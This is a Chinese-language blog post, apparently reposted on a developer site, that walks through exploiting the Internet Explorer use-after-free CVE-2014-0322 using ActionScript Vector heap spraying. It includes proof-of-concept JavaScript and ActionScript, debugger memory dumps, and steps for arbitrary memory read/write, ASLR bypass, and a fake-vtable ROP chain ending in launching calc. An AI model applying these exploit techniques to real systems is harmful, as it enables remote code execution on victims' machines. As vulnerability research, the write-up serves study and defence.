CVE-2014-0322 Exploit ActionScript Heap Spray

栏目: JavaScript · 发布时间: 6年前

内容简介:CVE-2014-0322 Exploit ActionScript Heap Spray

之前调试CVE-2014-0322这个洞的时候用的是Js的heapspray技术,这几天因为在项目中尝试一点新的利用方法稍微做了点关于ActionScript的喷射利用技术,还是挺有意思,不过也是和Js的heapspray技术差不太多。总体利用思路是通过漏洞修改数组长度达到地址任意读写,继而leak基址构造rop,修改虚表指针达到控制eip跳到rop链。

调试环境:

Windows 7 SP1
mshtml 10.0.9200.16438
kernel32 6.1.7601.17932
Adobe Flash 15.0.0.223

0x02 漏洞分析

CVE-2014-0322在之前的漏洞分析文章中已经提过了,一个经典的UAF漏洞,通过控制内存占位可以达到inc一个字节的目的,内存占位的poc 

function handler() {
  this.outerHTML = this.outerHTML;

    elem = document.createElement("div");
    elem.className = add(0x7c/2) + dword2date(0x12121008) + add(0x14/2) + dword2date(0x12121000) + dword2date(0x12121008) + add(0x10/2) + dword2date(0x12120ff3) + add(0x290/2-2);			
}

0x03 ActionScript Vector 喷射

测试采用的是Flash 15的版本(实际测试15、16、17、18都可以很好的支持) 

public function Main():void 
	{
		for (var i:int = 0; i < spray.length; i++) {
			spray[i] = new Vector.<uint>(1008)
			spray[i][1] = 0x12121014
			spray[i][2] = 0x12120d28
		}
}

这样可以在IE10的环境下(IE11也支持)精确的喷射。 

0:018> dd 12122000
12122000  000003f0 064b2000 00000000 12121014
12122010  12120d28 00000000 00000000 00000000
12122020  00000000 00000000 00000000 00000000
12122030  00000000 00000000 00000000 00000000
12122040  00000000 00000000 00000000 00000000
12122050  00000000 00000000 00000000 00000000
12122060  00000000 00000000 00000000 00000000
12122070  00000000 00000000 00000000 00000000
0:018> dd 12123000
12123000  000003f0 064b2000 00000000 12121014
12123010  12120d28 00000000 00000000 00000000
12123020  00000000 00000000 00000000 00000000
12123030  00000000 00000000 00000000 00000000
12123040  00000000 00000000 00000000 00000000
12123050  00000000 00000000 00000000 00000000
12123060  00000000 00000000 00000000 00000000
12123070  00000000 00000000 00000000 00000000

可以看出每一个Vector对象中第一个dword是对象的大小,第二个是应该是对象指针,第三个dword以后就是Vector的数据了,这样我们就可以通过漏洞修改某一个Vector数组的长度直接数组越界写,在修改下一个Vector的长度为0xffffffff直接达到内存任意读写目的(这里adobe居然没有进行任何安全检查简直ZZ Orz)

0x04 内存任意读写

在将一个Vector的长度修改以后,接下来就可以越界读写后一个Vector的长度大小,直接简单粗暴修改为0xffffffff,内存任意读写 

0:018> dd 12122000
12122000  ffffffff 05f32000 00000000 12121014
12122010  12120d28 00000000 00000000 00000000
12122020  00000000 00000000 00000000 00000000
12122030  00000000 00000000 00000000 00000000
12122040  00000000 00000000 00000000 00000000
12122050  00000000 00000000 00000000 00000000
12122060  00000000 00000000 00000000 00000000
12122070  00000000 00000000 00000000 00000000

0x05 leak基址 & Bypass ASLR

leak基址就很简单了,已经内存任意读,读到Vector对象的虚表地址,直接根据偏移就可以计算出Flash的加载基址,获得Flash的基址以后,在根据Flash的导入表就可以得到VritualProtect地址,根据leak的VritualProtect地址就可以很方便的构造一个非常简单的rop链。

0x06 控制eip & Bypass DEP

控制eip我们需要修改Vector对象的虚表,将Vector的虚表指针修改成堆上的地址,在调用Vector的函数控制eip。 

write(spray[i][i2 + 1] - 1, 0x12122008, i)   //将Vector对象的虚表改为堆上的地址,伪造一个虚表

//伪造一个虚表,使得执行writeUTF函数的时候指向的是xchg_eax_esp的地址,达到控制eip的效果,在bypass DEP
spray[i][00] = virtualprotect_addr
spray[i][01] = 0x121220a0
spray[i][02] = 0x12122018
spray[i][03] = 0x200
spray[i][04] = 0x40
spray[i][05] = 0x12122008
spray[i][35] = xchg_eax_esp_addr

//调用虚函数,控制EIP
ba.writeUTF("calc")

以上所述就是小编给大家介绍的《CVE-2014-0322 Exploit ActionScript Heap Spray》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

码农书籍
领域驱动设计

领域驱动设计

[美] Eric Evans / 赵俐、盛海艳、刘霞 / 人民邮电出版社 / 2016-6-1 / 69

本书是领域驱动设计方面的经典之作,修订版更是对之前出版的中文版进行了全面的修订和完善。 全书围绕着设计和开发实践,结合若干真实的项目案例,向读者阐述如何在真实的软件开发中应用领域驱动设计。书中给出了领域驱动设计的系统化方法,并将人们普遍接受的一些实践综合到一起,融入了作者的见解和经验,展现了一些可扩展的设计新实践、已验证过的技术以及便于应对复杂领域的软件项目开发的基本原则。一起来看看 《领域驱动设计》 这本书的介绍吧!

码农工具
HTML 编码/解码
HTML 编码/解码

HTML 编码/解码

URL 编码/解码
URL 编码/解码

URL 编码/解码

HEX CMYK 转换工具
HEX CMYK 转换工具

HEX CMYK 互转工具

  • New
  • 文章
  • 话题
  • 教程
    • 关注 码农网 公众号
    版权所有,保留一切权利!© 2018-2024 码农网 粤ICP备17054400号-3